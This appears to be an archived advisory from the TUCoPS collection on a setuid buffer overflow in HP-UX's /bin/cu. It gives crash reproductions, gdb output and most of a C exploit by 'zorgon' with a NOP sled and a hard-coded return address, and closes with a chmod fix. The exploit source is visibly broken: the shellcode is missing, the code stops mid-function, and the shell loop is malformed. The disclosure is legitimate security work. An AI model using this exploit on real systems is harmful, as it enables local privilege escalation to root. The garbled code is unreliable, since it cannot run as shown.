Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: HP/UX :: cu.htm

HP-UX 10.2, 11.0 cu vulnerability



    HpUX 10.20, 11.00


    'zorgon' found following (tested on HP-UX B.11.00).

        $ ls -la `which cu`
        -r-sr-xr-x   1 bin          40960  9 avr  1998 /bin/cu

    Using '-l' with a long option string:

        $ cu -l `perl -e 'printf "A" x 9777'`
        La connexion a  chou     : Requested device/system name not known

        $ cu -l `perl -e 'printf "A" x 9778'`
        Memory fault

    It's exploitable on 10.20 (trivial exploit: you don't even have to
    find return address, the buffer itself gets executed).  HP-UX  9.x
    68k seems to be vulnerable too.  On HP-UX 11 you need PA-RISC  1.1
    shell code, and the PC you get with

        ./cu -l `perl -e 'printf "A" x 5667'`

    changes randomly  (why?).   Eventually you  get a  pointer to your

        $ while :
        ./cu -l `perl -e 'printf "A" x 5667'`
        if file core | egrep -v SIGILL

        Illegal instruction(coredump)
        Connect failed: Requested device/system name not known

        Illegal instruction(coredump)
        Memory fault(coredump)
        core:           core file from 'cu' - received SIGSEGV

        $  gdb cu core
        Core was generated by `cu'.
        Program terminated with signal 11, Segmentation fault.
        Unable to find __dld_flags symbol in object file.

        #0  0x7f7eb010 in ?? ()
        #0  0x7f7eb010 in ?? ()
        (gdb) print {char *} 0x7f7eb010
        $1 = 0x41414141 <Address 0x41414141 out of bounds>

    zorgon has written an exploit for the HP/UX /bin/cu command:

    /* Copyright (c) 2001 Zorgon
     * All Rights Reserved
     * The copyright notice above does not evidence any
     * actual or intended publication of such source code.
     * HP-UX /bin/cu exploit.
     * Tested on HP-UX 11.00
     * (
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>
    #define LEN 9778
    #define HPPA_NOP 0x0b390280
    #define RET 0x7f7eb010
    #define OFFSET 1200    /* it works for me */
    u_char hppa_shellcode[] = /* K2 <> shellcode */
    main(int argc , char **argv){
            char buffer[LEN+8];
            int i;
            long retaddr = RET;
            int offset = OFFSET;
            if(argc>1) offset = atoi(argv[1]);
            for (i=0;i<LEN;i+=4)
                    *(long *)&buffer[i] = retaddr + offset;
            for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
                    *(buffer+i) = HPPA_NOP;
            fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
            fprintf(stderr, "Copyright (c) 2001 Zorgon\n");
            fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));


    Fix: chmod -s /bin/cu

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH